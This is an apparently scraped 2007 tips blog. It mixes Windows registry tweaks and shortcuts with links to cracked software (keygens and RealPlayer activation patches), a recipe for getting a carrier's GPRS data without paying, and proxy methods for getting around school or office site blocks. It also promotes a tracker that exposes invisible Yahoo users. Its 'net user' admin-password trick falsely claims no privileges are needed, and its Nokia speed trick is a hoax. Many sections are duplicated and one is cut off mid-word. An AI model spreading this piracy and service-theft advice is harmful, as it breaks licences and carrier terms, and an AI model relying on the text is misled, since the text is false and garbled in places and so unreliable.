http://rapidshare.com/files/54146652/WinASO_1_.Registry.Optimizer_3.0.9_Incl.Keygen-ViRiLiTY.rar
One more software for taking backup and restoring all the drivers of the pc. it is the most popular software all over the world:::::::::::
http://rapidshare.com/files/54148361/Dri.GenPro.v7.1.622.Multilingual.rar
this converter is most wanted but it is not easily available. it converts mp3 or any other format to real player format so that u can save ur disk space:::::::
http://rapidshare.com/files/54150795/realconverterpro.rar
KeYGEN:
http://rapidshare.com/files/54151002/Real.Converter.Pro.v6.5.Keymaker.Only-CORE.rar
u can convert videos also to real player format thru this converter.......
Thursday, October 25, 2007
Check all Registry tricks here.......
Add Open With to all files
You can add "Open With..." to the Right click context menu of all files.This is great for when you have several programs you want to open the same file types with. I use three different text editors so I added it to the ".txt" key.
1. Open RegEdit
2. Go to HKEY_CLASSES_ROOT\*\Shell
3. Add a new Key named "OpenWith" by right clicking the "Shell" Key and selecting new
4. Set the (Default) to "Op&en With..."
5. Add a new Key named "Command" by right clicking the "OpenWith" Key and selecting new
6. Set the (Default) to "C:\Windows\rundll32.exe shell32.dll,OpenAs_RunDLL %1", C:\ being your Windows drive. You must enter the "OpenAs_RunDLL %1" exactly this way.
Stomize ur system tray!!!!!!
You can add your name or anything you like that consists of 8 characters or less. This will replace the AM or PM next to the system time. But you can corrupt some trial licenses of software that you may have downloaded.
1. Open RegEdit
2. Go to HKEY_CURRENT_USER\Control Panel\International
3. Add two new String values, "s1159" and "s2359"
4. Right click the new value name and modify. Enter anything you like up to 8 characters.
If you enter two different values when modifying, you can have the system tray display the two different values in the AM and PM
Lock unwanted Users.........
Want to keep people from accessing Windows, even as the default user? If you do not have a domain do not attempt this.
1. Open RegEdit
2. Go to HKEY_LOCAL_MACHINE\Network\Logon
3. Create a dword value "MustBeValidated"
4. Set the value to 1
This forced logon can be bypassed in Safe Mode on Windows 9x
Disable outlook xpress flash screen.........
You can make OutLook Express load quicker by disabling the splash screen:
1. Open RegEdit
2. Go to HKEY_CURRENT_USER\Software\Microsoft\OutLook Express
3. Add a string value "NoSplash"
4. Set the value data to 1 as a Dword value
Multiple colums for start menu.........
To make Windows use multiple Start Menu Columns instead of a single scrolling column, like Windows 9x had, Also if you are using Classic Mode in XP
1. Open RegEdit
2. Go to the key
HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Explorer\ Advanced
3. Create a string value "StartMenuScrollPrograms"
4. Right click the new string value and select modify
5. Set the value to "FALSE
Change ur windows iconz..........
You can change the Icons Windows uses for folders, the Start Menu, opened and closed folder in the Explorer, and many more.
1. Open RegEdit
2. Go to
HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Explorer\ Shell Icons
3. Add a string value for each Icon you wish to change.
Example: "3" ="C:\Windows\Icons\MyIcon.ico,0" This will change the closed folders in the Explorer to "MyIcon.ico". Here is a complete list for each value.
0= Unknown file type
1= MSN file types
2= Applications Generic
3= Closed Folder
4= Open Folder
5= 5.25" Drive
6= 3.25" Drive
7= Removable Drive
8= Hard Drive
9= NetWork Drive
10= Network Drive Offline
11= CD-ROM Drive
12= RAM Drive
13= Entire Network 14= Network Hub
15= My Computer
16= Printer
17= Network Neighborhood
18= Network Workgroup
19= Start Menu's Program Folders
20= Start Menu's Documents
21= Start Menu's Setting
22= Start Menu's Find
23= Start Menu's Help
24= Start Menu's Run
25= Start Menu's Suspend
26= Start Menu's PC Undock
27= Start Menu's Shutdown 28= Shared
29= Shortcut Arrow
30= (Unknown Overlay)
31= Recycle Bin Empty
32= Recycle Bin Full
33= Dial-up Network
34= DeskTop
35= Control Panel
36= Start Menu's Programs
37= Printer Folder
38= Fonts Folder
39= Taskbar Icon
40= Audio CD
You need to reboot after making changes. You may need to delete the hidden file ShellIconCache if after rebooting the desired Icons are not displayed
Change default folder locations........
You can change or delete the Windows mandatory locations of folder like My Documents:
1. Open RegEdit
2. Go to HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Explorer\ Shell Folders
3. Change the desired folder location, My Documents is normally list as "Personal"
4. Open the Explorer and rename or create the folder you wish.
To change the desired location of the Program Files folder
1. Go to
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
2. Change the value of "ProgramFiles", or "ProgramFilesDir"
Now when you install a new program it will default to the new location you have selected.
change reg. user info..............
You can change the Registered Owner or Registered Organization to anything you want even after Windows is installed.
1) Open RegEdit
2) Got to
HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion.
3) Change the value of "RegisteredOrganization" or "RegisteredOwner", to what ever you want
Opening a DOS Window to either the Drive or Direct
Add the following Registry Keys for a Directory:
HKEY_CLASSES_ROOT\Directory\shell\opennew
@="Dos Prompt in that Directory"
HKEY_CLASSES_ROOT\Directory\shell\opennew\command
@="command.com /k cd %1"
Add or Edit the following Registry Keys for a Drive:
HKEY_CLASSES_ROOT\Drive\shell\opennew
@="Dos Prompt in that Drive"
HKEY_CLASSES_ROOT\Drive\shell\opennew\command
@="command.com /k cd %1"
These will allow you to right click on either the drive or the directory and the option of starting the dos prompt will pop up
Changing Exchange/Outlook Mailbox Location
To change the location of your mailbox for Exchange:
1. Open RegEdit
2. Go to
HKEY_CURRENT_USER\Software\ Microsoft\Windows Messaging Subsystem\ Profiles
3. Go to the profile you want to change
4. Go to the value name that has the file location for your mailbox (*.PST) file
5. Make the change to file location or name
To change the location of your mailbox for Outlook
1. Open RegEdit
2. Go to HKEY_CURRENT_USER\Software\Microsoft\Outlook (or Outlook Express if Outlook Express)
3. Go to the section "Store Root"
4. Make the change to file location
You can add "Open With..." to the Right click context menu of all files.This is great for when you have several programs you want to open the same file types with. I use three different text editors so I added it to the ".txt" key.
1. Open RegEdit
2. Go to HKEY_CLASSES_ROOT\*\Shell
3. Add a new Key named "OpenWith" by right clicking the "Shell" Key and selecting new
4. Set the (Default) to "Op&en With..."
5. Add a new Key named "Command" by right clicking the "OpenWith" Key and selecting new
6. Set the (Default) to "C:\Windows\rundll32.exe shell32.dll,OpenAs_RunDLL %1", C:\ being your Windows drive. You must enter the "OpenAs_RunDLL %1" exactly this way.
Stomize ur system tray!!!!!!
You can add your name or anything you like that consists of 8 characters or less. This will replace the AM or PM next to the system time. But you can corrupt some trial licenses of software that you may have downloaded.
1. Open RegEdit
2. Go to HKEY_CURRENT_USER\Control Panel\International
3. Add two new String values, "s1159" and "s2359"
4. Right click the new value name and modify. Enter anything you like up to 8 characters.
If you enter two different values when modifying, you can have the system tray display the two different values in the AM and PM
Lock unwanted Users.........
Want to keep people from accessing Windows, even as the default user? If you do not have a domain do not attempt this.
1. Open RegEdit
2. Go to HKEY_LOCAL_MACHINE\Network\Logon
3. Create a dword value "MustBeValidated"
4. Set the value to 1
This forced logon can be bypassed in Safe Mode on Windows 9x
Disable outlook xpress flash screen.........
You can make OutLook Express load quicker by disabling the splash screen:
1. Open RegEdit
2. Go to HKEY_CURRENT_USER\Software\Microsoft\OutLook Express
3. Add a string value "NoSplash"
4. Set the value data to 1 as a Dword value
Multiple colums for start menu.........
To make Windows use multiple Start Menu Columns instead of a single scrolling column, like Windows 9x had, Also if you are using Classic Mode in XP
1. Open RegEdit
2. Go to the key
HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Explorer\ Advanced
3. Create a string value "StartMenuScrollPrograms"
4. Right click the new string value and select modify
5. Set the value to "FALSE
Change ur windows iconz..........
You can change the Icons Windows uses for folders, the Start Menu, opened and closed folder in the Explorer, and many more.
1. Open RegEdit
2. Go to
HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Explorer\ Shell Icons
3. Add a string value for each Icon you wish to change.
Example: "3" ="C:\Windows\Icons\MyIcon.ico,0" This will change the closed folders in the Explorer to "MyIcon.ico". Here is a complete list for each value.
0= Unknown file type
1= MSN file types
2= Applications Generic
3= Closed Folder
4= Open Folder
5= 5.25" Drive
6= 3.25" Drive
7= Removable Drive
8= Hard Drive
9= NetWork Drive
10= Network Drive Offline
11= CD-ROM Drive
12= RAM Drive
13= Entire Network 14= Network Hub
15= My Computer
16= Printer
17= Network Neighborhood
18= Network Workgroup
19= Start Menu's Program Folders
20= Start Menu's Documents
21= Start Menu's Setting
22= Start Menu's Find
23= Start Menu's Help
24= Start Menu's Run
25= Start Menu's Suspend
26= Start Menu's PC Undock
27= Start Menu's Shutdown 28= Shared
29= Shortcut Arrow
30= (Unknown Overlay)
31= Recycle Bin Empty
32= Recycle Bin Full
33= Dial-up Network
34= DeskTop
35= Control Panel
36= Start Menu's Programs
37= Printer Folder
38= Fonts Folder
39= Taskbar Icon
40= Audio CD
You need to reboot after making changes. You may need to delete the hidden file ShellIconCache if after rebooting the desired Icons are not displayed
Change default folder locations........
You can change or delete the Windows mandatory locations of folder like My Documents:
1. Open RegEdit
2. Go to HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Explorer\ Shell Folders
3. Change the desired folder location, My Documents is normally list as "Personal"
4. Open the Explorer and rename or create the folder you wish.
To change the desired location of the Program Files folder
1. Go to
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
2. Change the value of "ProgramFiles", or "ProgramFilesDir"
Now when you install a new program it will default to the new location you have selected.
change reg. user info..............
You can change the Registered Owner or Registered Organization to anything you want even after Windows is installed.
1) Open RegEdit
2) Got to
HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion.
3) Change the value of "RegisteredOrganization" or "RegisteredOwner", to what ever you want
Opening a DOS Window to either the Drive or Direct
Add the following Registry Keys for a Directory:
HKEY_CLASSES_ROOT\Directory\shell\opennew
@="Dos Prompt in that Directory"
HKEY_CLASSES_ROOT\Directory\shell\opennew\command
@="command.com /k cd %1"
Add or Edit the following Registry Keys for a Drive:
HKEY_CLASSES_ROOT\Drive\shell\opennew
@="Dos Prompt in that Drive"
HKEY_CLASSES_ROOT\Drive\shell\opennew\command
@="command.com /k cd %1"
These will allow you to right click on either the drive or the directory and the option of starting the dos prompt will pop up
Changing Exchange/Outlook Mailbox Location
To change the location of your mailbox for Exchange:
1. Open RegEdit
2. Go to
HKEY_CURRENT_USER\Software\ Microsoft\Windows Messaging Subsystem\ Profiles
3. Go to the profile you want to change
4. Go to the value name that has the file location for your mailbox (*.PST) file
5. Make the change to file location or name
To change the location of your mailbox for Outlook
1. Open RegEdit
2. Go to HKEY_CURRENT_USER\Software\Microsoft\Outlook (or Outlook Express if Outlook Express)
3. Go to the section "Store Root"
4. Make the change to file location
Reset ur admin password and create new now........
note : quotes (") are just for highlighting the word
1. click on start, enter "cmd" and press enter
2. enter "net user" or "net users"
you will see the list of users that are created on current running os
3. type "net user" "user name" "*"
you will see that windows will now ask you to enter new password for that particular account!
magic! no any type of super user privileges needed!
see the commands below:
If the administrator account user name is "admn" then command to change it's password will be...
net user admn *
OR see this video
http://www.youtube.com/watch?v=NTPxdG2j5FA
1. click on start, enter "cmd" and press enter
2. enter "net user" or "net users"
you will see the list of users that are created on current running os
3. type "net user" "user name" "*"
you will see that windows will now ask you to enter new password for that particular account!
magic! no any type of super user privileges needed!
see the commands below:
If the administrator account user name is "admn" then command to change it's password will be...
net user admn *
OR see this video
http://www.youtube.com/watch?v=NTPxdG2j5FA
Access Blocked sites now...........
Cant open the sites you want at college or office????
Don’t worry there are lot of ways to open them, here are a few of them
1-www.proxylord.com
2-www.proxyfoxy.com
3-www.hidemyass.com
4-www.youhide.com
5-www.proxyblind.org
6.www.kproxy.com
You can use this site for instant messaging on Yahoo, Gmail, MSN .
www.meebo.com
Don’t worry there are lot of ways to open them, here are a few of them
1-www.proxylord.com
2-www.proxyfoxy.com
3-www.hidemyass.com
4-www.youhide.com
5-www.proxyblind.org
6.www.kproxy.com
You can use this site for instant messaging on Yahoo, Gmail, MSN .
www.meebo.com
Hidden Music in windows XP
Discover Hidden Music in Windows XP
you know, there is a hidden music in Windows XP that you have never heard..
To hear this sound, first of all go to Folder Options and under the "View" tab, check "Show hidden files and folder" and uncheck "Hide protected system files".
Now navigate to the drive where Windows XP is installed.So if C:\ is the drive where Windows XP is installed, goto
C:\WINDOWS\system32\oobe\images
There you will find a file Title.wma.Open in with media player and listen to it
you know, there is a hidden music in Windows XP that you have never heard..
To hear this sound, first of all go to Folder Options and under the "View" tab, check "Show hidden files and folder" and uncheck "Hide protected system files".
Now navigate to the drive where Windows XP is installed.So if C:\ is the drive where Windows XP is installed, goto
C:\WINDOWS\system32\oobe\images
There you will find a file Title.wma.Open in with media player and listen to it
Speed up ur nokia mobiles.................
speed up ur cell
GOOD NEWS FOR SYMBIAN USER!!!!!! SPEED UP YOUR PHONE UP TO 80%!!!!!Yes!! That truth guys!!!!! Its work on my 3230 and also 6600, n-gage and etc……… Just follow this trick…….
First go to ur To-do List.
Make a note and input as follows
Subject: Speed
Due Date: 29-01-2005(dd-mm-yy)
Priority: set to High
then press Done
Go to option again and make a second note and input as follows
Subject: Qoukie
Due Date: 29-01-2005(dd-mm-yy)
Priority: set to Low
then press Done
Do not exit yet. Highlight the Speed note, select Options and Mark as done.
Then highlight the Qoukie note, select Options and Mark as done.
Now, reboot your mobile.
I know a sound like bullshit, crazy, hoax, April fool joke or other kind of words!! Me too, but after I tried it, OH MY GOD!!!! Its works!!! How it can be? Don’t ask me…Someone may ask, why 29-01-2005? Just say, the date is a LUCKY DATE for ur symbian phone!! This tips is a great For symbian phone especially for N 3230 which a slowest phone among symbian Os but with a great feature not including a sound……. unfortunately this tips not for sound improvement…..my be someday I will post a trick to improve the sound quality. Pray for me………..
What it did? This tips will increase ur phone speed including fast start up and browser, improve speed on camera and videocam app,3d Gaming, MP3 player and other application. On easy word, ITS MAKE YOUR PHONE MORE FASTER THAN EVER!!!!!!!!!!!!! Try benchmark before and after u use this tips using SPmark or other app. And post ur opinion here. Even u not using benchmark app. U still can see a different. BELIEVE ME!!!!
For n3230 user, this is what all of u waiting for. SPEED!!!!!!!!!!!YES!!!!
Some of u my be have a experience a lag of speed especially Menu to menu browsing, loading program, uninstall java app. ,opening gallery and App. Manager especially if u have a big memory (mine 256mb). So this is a solution. No need to upgrade ur firmware for speed anymore!!!!!!!
IMPORTANT NOTE:
If you have Symant
GOOD NEWS FOR SYMBIAN USER!!!!!! SPEED UP YOUR PHONE UP TO 80%!!!!!Yes!! That truth guys!!!!! Its work on my 3230 and also 6600, n-gage and etc……… Just follow this trick…….
First go to ur To-do List.
Make a note and input as follows
Subject: Speed
Due Date: 29-01-2005(dd-mm-yy)
Priority: set to High
then press Done
Go to option again and make a second note and input as follows
Subject: Qoukie
Due Date: 29-01-2005(dd-mm-yy)
Priority: set to Low
then press Done
Do not exit yet. Highlight the Speed note, select Options and Mark as done.
Then highlight the Qoukie note, select Options and Mark as done.
Now, reboot your mobile.
I know a sound like bullshit, crazy, hoax, April fool joke or other kind of words!! Me too, but after I tried it, OH MY GOD!!!! Its works!!! How it can be? Don’t ask me…Someone may ask, why 29-01-2005? Just say, the date is a LUCKY DATE for ur symbian phone!! This tips is a great For symbian phone especially for N 3230 which a slowest phone among symbian Os but with a great feature not including a sound……. unfortunately this tips not for sound improvement…..my be someday I will post a trick to improve the sound quality. Pray for me………..
What it did? This tips will increase ur phone speed including fast start up and browser, improve speed on camera and videocam app,3d Gaming, MP3 player and other application. On easy word, ITS MAKE YOUR PHONE MORE FASTER THAN EVER!!!!!!!!!!!!! Try benchmark before and after u use this tips using SPmark or other app. And post ur opinion here. Even u not using benchmark app. U still can see a different. BELIEVE ME!!!!
For n3230 user, this is what all of u waiting for. SPEED!!!!!!!!!!!YES!!!!
Some of u my be have a experience a lag of speed especially Menu to menu browsing, loading program, uninstall java app. ,opening gallery and App. Manager especially if u have a big memory (mine 256mb). So this is a solution. No need to upgrade ur firmware for speed anymore!!!!!!!
IMPORTANT NOTE:
If you have Symant
Hide any drive in your pc now..................
If u r having any material like important docs and u r afraid about it . Dont worry, windows XP
provides (not officialy ) a utility by which u can hide urs one or more drives.
Here is the step by step procedure how to hide any partition/drive :
1. Go to Start > run > type “diskpart”.
A DOS window will appear with following discription.
DISKPART>
2. Then type “list volume”
The result will look like : ——
Volume ### Ltr Label Fs Type Size Status Info
————— — ——– —- —— —- —— —-
Volume 0 F CD-ROM
Volume 1 C Programmea NTFS Partition 15GB Healthy System
Volume 2 D Softwares NTFS Partition 20GB Healthy
Volume 3 E Documents NTFS Partition 30GB Healthy
Volume 4 F Abi NTFS Partition 10GB Healthy
3. Suppose u wanna hide drive E then type “select volume 3".(without quotes)
Then a message will appear in same winwods { Volume 3 is the selected volume}
4. Now type “remove letter E”
Now a message will come { Diskpart Removed the Drive letter }
Diskpart will remove the letter .Windows XP is not having capabilty to identify the unkown
volume.
Your Data is safe now from all unauthorised users.
To access the content of hidden Drive repeat the process mentioned above. But in 4th step replace
” remove” to “assign”
i mean type “assign letter E”
Never hide C:/ drive… otherwise ur system will not work
provides (not officialy ) a utility by which u can hide urs one or more drives.
Here is the step by step procedure how to hide any partition/drive :
1. Go to Start > run > type “diskpart”.
A DOS window will appear with following discription.
DISKPART>
2. Then type “list volume”
The result will look like : ——
Volume ### Ltr Label Fs Type Size Status Info
————— — ——– —- —— —- —— —-
Volume 0 F CD-ROM
Volume 1 C Programmea NTFS Partition 15GB Healthy System
Volume 2 D Softwares NTFS Partition 20GB Healthy
Volume 3 E Documents NTFS Partition 30GB Healthy
Volume 4 F Abi NTFS Partition 10GB Healthy
3. Suppose u wanna hide drive E then type “select volume 3".(without quotes)
Then a message will appear in same winwods { Volume 3 is the selected volume}
4. Now type “remove letter E”
Now a message will come { Diskpart Removed the Drive letter }
Diskpart will remove the letter .Windows XP is not having capabilty to identify the unkown
volume.
Your Data is safe now from all unauthorised users.
To access the content of hidden Drive repeat the process mentioned above. But in 4th step replace
” remove” to “assign”
i mean type “assign letter E”
Never hide C:/ drive… otherwise ur system will not work
Free BSNL GPRS now................................
Free Bsnl Gprs With Full Internet Access, U Can Surf For Free Via Gprs On Pc Too
Here is the way.
1.Create 2 connections with different names like "BSNL PORTAL" and "CELLONE PORTAL" with following settings.
Access Point Name-
"celloneportal"
Proxy Service Address-
"192.168.51.163"
Proxy Port-
"8080"
Security-
"NORMAL"
rest fields to be as it is.
2.now open phone's default inbuilt browser and select any of the two settings created to access the web.you will now access only bsnl's home site.
3.now keep browser working and open another browser for full internet access like opera or netfront.in these browsers use the second setting created.make sure to use second setting this time.connect to open a page.you get an error message like "ACCESS DENIED" but you dont worry.
4.keep both browsers working in background and open connection manager.in connection manager just disconnect the connection that is not working like the second one you used to connect opera or netfront.
5.again open opera or netfront from background and this time use the first connection that you are using to connect with default inbuilt browser to connect to internet.
6.sure this time you are connected with full access.
Here is the way.
1.Create 2 connections with different names like "BSNL PORTAL" and "CELLONE PORTAL" with following settings.
Access Point Name-
"celloneportal"
Proxy Service Address-
"192.168.51.163"
Proxy Port-
"8080"
Security-
"NORMAL"
rest fields to be as it is.
2.now open phone's default inbuilt browser and select any of the two settings created to access the web.you will now access only bsnl's home site.
3.now keep browser working and open another browser for full internet access like opera or netfront.in these browsers use the second setting created.make sure to use second setting this time.connect to open a page.you get an error message like "ACCESS DENIED" but you dont worry.
4.keep both browsers working in background and open connection manager.in connection manager just disconnect the connection that is not working like the second one you used to connect opera or netfront.
5.again open opera or netfront from background and this time use the first connection that you are using to connect with default inbuilt browser to connect to internet.
6.sure this time you are connected with full access.
Use google as a proxy and bypass any block!!!!!!!!
Many jobs and schools/countries block access to certain sites. However, it is very difficult for anybody to block access to
google. By using google with either of these two methods, you can gain access to blocked sites very easily.
Blocked web site, huh? Need a proxy?
I am not a big fan of chasing free, open proxies all over the place. I use google instead. Here I describe what I believe is an
uncommon way for bypassing blocked sites using google.
1:
The first and most common way of using google to bypass blocked sites is just to search for the site and then clicked the
"cached" link that appears on google. Easy, simple, and frequently works for static information.
2:
Passing the site through google translator works well as well. Here's the URL to use: Code:
http://www.google.com/translate?langpair=en|en&u=www.blockedsite.com
(where blockedsite.com is the site that you wish to visit)
This translates the site from english to english and works because the ip address will appear as google instead of you. Here's
a link to tech-recipes passed through the translator as an example. You can actually do this with any langpair. Change en|en
in the URL above to spanish by using es|es and it still works.
3:Unique method that I have not seen described before is to search through google mobile. Google mobile will "convert as you
go" very similiar to the translation method above.
Just search for your site with google mobile and click on the link it provides. Here's is tech-recipes brought up through google
mobile search. Once again, this will allow you to bypass any blocks because the IP request comes from google not for you.
Like the translation method above, google will continue to "proxy" as you continue to visit links through the site. The only side
effect of this method is that google formats the site for a mobile device.
google. By using google with either of these two methods, you can gain access to blocked sites very easily.
Blocked web site, huh? Need a proxy?
I am not a big fan of chasing free, open proxies all over the place. I use google instead. Here I describe what I believe is an
uncommon way for bypassing blocked sites using google.
1:
The first and most common way of using google to bypass blocked sites is just to search for the site and then clicked the
"cached" link that appears on google. Easy, simple, and frequently works for static information.
2:
Passing the site through google translator works well as well. Here's the URL to use: Code:
http://www.google.com/translate?langpair=en|en&u=www.blockedsite.com
(where blockedsite.com is the site that you wish to visit)
This translates the site from english to english and works because the ip address will appear as google instead of you. Here's
a link to tech-recipes passed through the translator as an example. You can actually do this with any langpair. Change en|en
in the URL above to spanish by using es|es and it still works.
3:Unique method that I have not seen described before is to search through google mobile. Google mobile will "convert as you
go" very similiar to the translation method above.
Just search for your site with google mobile and click on the link it provides. Here's is tech-recipes brought up through google
mobile search. Once again, this will allow you to bypass any blocks because the IP request comes from google not for you.
Like the translation method above, google will continue to "proxy" as you continue to visit links through the site. The only side
effect of this method is that google formats the site for a mobile device.
Create ur own icons in win XP.............
It's shockingly easy to create your own icons in Windows XP. Let's do it: Click Start, click All Programs, click Accessories, and then click Paint. On the Image menu, click Attributes. Type 32 for both the Width and Height of the document, and make sure that Pixels is selected under Units. Click OK to create a new 32x32-pixel document: the size of an icon.
Now add type, color, or do whatever you'd like to your image. I like to shrink photos (headshots work best) to 32x32 and simply paste them into my Paint document. When you're finished, open the File menu and click Save As. Use the dialog box to choose where you want to save your file, then give it a name followed by ".ico" (without the quotes), and click Save. (The extension ".ico" tells Windows that it's an icon file.) You just created an icon! Now you can change any shortcut or folder to your own icon—just browse to it on your hard drive.
Now add type, color, or do whatever you'd like to your image. I like to shrink photos (headshots work best) to 32x32 and simply paste them into my Paint document. When you're finished, open the File menu and click Save As. Use the dialog box to choose where you want to save your file, then give it a name followed by ".ico" (without the quotes), and click Save. (The extension ".ico" tells Windows that it's an icon file.) You just created an icon! Now you can change any shortcut or folder to your own icon—just browse to it on your hard drive.
The hidden windows key secrets.............
The Windows logo key, located in the bottom row of most computer keyboards is a little-used treasure. Don't' ignore it. It is the shortcut anchor for the following commands:
Windows: Display the Start menu
Windows + D: Minimize or restore all windows
Windows + E: Display Windows Explorer
Windows + F: Display Search for files
Windows + Ctrl + F: Display Search for computer
Windows + F1: Display Help and Support Center
Windows + R: Display Run dialog box
Windows + break: Display System Properties dialog box
Windows + shift + M: Undo minimize all windows
Windows + L: Lock the workstation
Windows + U: Open Utility Manager
Windows + Q: Quick switching of users (Powertoys only)
Windows + Q: Hold Windows Key, then tap Q to scroll thru the different users on your PC
Windows: Display the Start menu
Windows + D: Minimize or restore all windows
Windows + E: Display Windows Explorer
Windows + F: Display Search for files
Windows + Ctrl + F: Display Search for computer
Windows + F1: Display Help and Support Center
Windows + R: Display Run dialog box
Windows + break: Display System Properties dialog box
Windows + shift + M: Undo minimize all windows
Windows + L: Lock the workstation
Windows + U: Open Utility Manager
Windows + Q: Quick switching of users (Powertoys only)
Windows + Q: Hold Windows Key, then tap Q to scroll thru the different users on your PC
Learn computer assembling in a simple way.........
A step by step guide with detailed pictures.
http://buildyourownpc.co.nr
http://buildyourownpc.co.nr
Track Yahoo messenger id's...............
Ques 1. What is Yahoo Tracker?
Ans. Yahoo Tracker is a web based service that allows you to track online/offline status of your yahoo buddies.
Ques 2. Can i track those who are not in my messenger list?
Ans. Yes you can, your yahoo username and password are not required to use this service.
Some more features about this service--
1. The service tracks the online/offline activity of Yahoo messenger user in previous 24 hours.
We might increase the time period to 1 week in near future.
2. You can track 12 yahoo users with one account. Yes its all free..!!
3. Data will be updated after every 10 minutes automatically.
4. Yahoo messenger users will be considered as online even if they are invisible to any number of people (not everyone). Being "on sms" and "on mobile" will also be considered as online.
So, enjoy Yahoo Tracker ALPHA by simple registration::::
http://www.yahootracker.com
Ans. Yahoo Tracker is a web based service that allows you to track online/offline status of your yahoo buddies.
Ques 2. Can i track those who are not in my messenger list?
Ans. Yes you can, your yahoo username and password are not required to use this service.
Some more features about this service--
1. The service tracks the online/offline activity of Yahoo messenger user in previous 24 hours.
We might increase the time period to 1 week in near future.
2. You can track 12 yahoo users with one account. Yes its all free..!!
3. Data will be updated after every 10 minutes automatically.
4. Yahoo messenger users will be considered as online even if they are invisible to any number of people (not everyone). Being "on sms" and "on mobile" will also be considered as online.
So, enjoy Yahoo Tracker ALPHA by simple registration::::
http://www.yahootracker.com
EXCLUSIVE=REAL PLAYER11 WITH ACTIV .PATCH
REAL PLAYER 11(BETA).WITH ACTIVATION PATCH
COPY AND PASTE THE PATCH IN UR REAL INSTALLATION. PATH
Close RealPlayer,AND GO TO REAL PLAYER INST. PATH THEN press "Patch" to start the activation process.
IT WILL UNLOCK...
RealNetwork policies for RealPlayer 10 & 11:
* Equalizer effect and crossfade don't apply to microsoft's windows media files.
* Video effects are only for real media video.
HERE IS HE DOWNLD LINK....
http://rapidshare.com/files/44151634/Real_Player_11.rar
COPY AND PASTE THE PATCH IN UR REAL INSTALLATION. PATH
Close RealPlayer,AND GO TO REAL PLAYER INST. PATH THEN press "Patch" to start the activation process.
IT WILL UNLOCK...
RealNetwork policies for RealPlayer 10 & 11:
* Equalizer effect and crossfade don't apply to microsoft's windows media files.
* Video effects are only for real media video.
HERE IS HE DOWNLD LINK....
http://rapidshare.com/files/44151634/Real_Player_11.rar
Realplayer ver 10 premium with patches............
here is the link =
http://rapidshare.com/files/44975526/RealPlayer_10_Activator.zip.html
about
RealPlayer v10 Premium Features Activation Patch.
This patch will active premium features of RealPlayer 10.
-10 Band Equalizer
- Crossfading
- Advanced Burning (MP3/Normalization/Crossfading)
- MP3 Hi Bitrate/Variable Bitrate
- 5 Video Controls
- Toolbar Mode
- Recording from Analog Sources
-Transcoding.
Install application, copy patch into RealPlayer installation directory and apply.
Note: This patch works while you signed in & out
http://rapidshare.com/files/44975526/RealPlayer_10_Activator.zip.html
about
RealPlayer v10 Premium Features Activation Patch.
This patch will active premium features of RealPlayer 10.
-10 Band Equalizer
- Crossfading
- Advanced Burning (MP3/Normalization/Crossfading)
- MP3 Hi Bitrate/Variable Bitrate
- 5 Video Controls
- Toolbar Mode
- Recording from Analog Sources
-Transcoding.
Install application, copy patch into RealPlayer installation directory and apply.
Note: This patch works while you signed in & out
Make all ur folders private............
•Open My Computer
•Double-click the drive where Windows is installed (usually drive (C), unless you have more than one drive on your computer).
•If the contents of the drive are hidden, under System Tasks, click Show the contents of this drive.
•Double-click the Documents and Settings folder.
•Double-click your user folder.
•Right-click any folder in your user profile, and then click Properties.
•On the Sharing tab, select the Make this folder private so that only I have access to it check box.
Note
•To open My Computer, click Start, and then click My Computer.
•This option is only available for folders included in your user profile. Folders in your user profile include My Documents and its subfolders, Desktop, Start Menu, Cookies, and Favorites. If you do not make these folders private, they are available to everyone who uses your computer.
•When you make a folder private, all of its subfolders are private as well. For example, when you make My Documents private, you also make My Music and My Pictures private. When you share a folder, you also share all of its subfolders unless you make them private.
•You cannot make your folders private if your drive is not formatted as NTFS For information about converting your drive to NTFS
•Double-click the drive where Windows is installed (usually drive (C), unless you have more than one drive on your computer).
•If the contents of the drive are hidden, under System Tasks, click Show the contents of this drive.
•Double-click the Documents and Settings folder.
•Double-click your user folder.
•Right-click any folder in your user profile, and then click Properties.
•On the Sharing tab, select the Make this folder private so that only I have access to it check box.
Note
•To open My Computer, click Start, and then click My Computer.
•This option is only available for folders included in your user profile. Folders in your user profile include My Documents and its subfolders, Desktop, Start Menu, Cookies, and Favorites. If you do not make these folders private, they are available to everyone who uses your computer.
•When you make a folder private, all of its subfolders are private as well. For example, when you make My Documents private, you also make My Music and My Pictures private. When you share a folder, you also share all of its subfolders unless you make them private.
•You cannot make your folders private if your drive is not formatted as NTFS For information about converting your drive to NTFS
Make online scans here..........
1. PCPitstop AntiVirus Online Scan: http://www.pcpitstop.com/antivirus/avload.asp
2. Trend Micro's free online (Housecall) virus scanner: http://housecall.trendmicro.com/
3. Panda ActiveScan Online Virus Scan: http://www.pandasoftware.com/activescan/com/activescan_principal.htm
4. Symantec's Online Scan: http://security2.norton.com/
5. BitDefender Free Online Virus Scan: http://www.bitdefender.com/scan/licence.php
2. Trend Micro's free online (Housecall) virus scanner: http://housecall.trendmicro.com/
3. Panda ActiveScan Online Virus Scan: http://www.pandasoftware.com/activescan/com/activescan_principal.htm
4. Symantec's Online Scan: http://security2.norton.com/
5. BitDefender Free Online Virus Scan: http://www.bitdefender.com/scan/licence.php
Make ur net connection faster than b4............
OpenDNS helps you navigate the Internet in a safer, faster, smarter and more reliable way. This service is free and requires nothing to download.
OpenDNS doesn't replace your existing Internet connection, it just makes it better.
U guys only have to do few tweaks in your preferred and alternate domain name server address at tcp/ip properties...
I have tested it, n the net speeds are much faster now...
There's lot's more than speed... If u type some wrong url say www.google.mo it will automatically be redirected to google.com...
It also prevents u 4m phishing sites n hacker attacks...
So try it out now guys,...
I think most of u will be knowing abt OpenDNS...
read about how to implement it here.. http://www.opendns.com/start/windows_xp.php
OpenDNS doesn't replace your existing Internet connection, it just makes it better.
U guys only have to do few tweaks in your preferred and alternate domain name server address at tcp/ip properties...
